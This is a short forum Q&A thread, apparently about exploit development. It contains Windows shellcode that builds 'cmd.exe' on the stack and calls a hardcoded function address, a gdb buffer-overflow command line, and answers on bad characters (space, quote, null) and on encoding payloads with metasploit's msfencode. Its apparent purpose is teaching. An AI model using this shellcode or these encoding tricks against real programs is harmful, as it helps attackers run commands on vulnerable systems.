Why is my shellcode is truncated after \x20 opcode, when it is copied by string to stack on a second vulnerable program?
--cmd.exe-- char shell[]= "\xc7\x44\x24\x0c\x65\x78\x65\x20" ← only this line is put in stack, though hv a enough space "\xc7\x44\x24\x08\x63\x6d\x64\x2e" "\x31\xc0" "\x89\x44\x24\x04" "\x8d\x44\x24\x08" "\x89\x04\x24" "\x8d\x05\xad\x23\x86\x7c" "\xff\xd0"; --end shell--
Put a double quotations around the entire command. For example, run:
"$shellcode" (gdb)r "$(python -c 'print "\x41" * 100 + "\x20\x83\x04\x08" + ....')"
Are you passing this shellcode as a command-line argument? In that case, take a look at the ASCII code for 0x20 ;)
My theory is that things like quote, space, null, etc are being interpreted by the windows shell rather than being sent through. You could escape it somehow, but I think it's easier to just encode the shellcode. So try metasploit's msfencode utility to avoid those opcodes altogether. I know null (/x00), space (/x20) and quote (/x22) can't be passed directly, but I suppose that there are other opcodes that can't be passed as well.
That's my solution, but does anyone know of any other ones that are better?
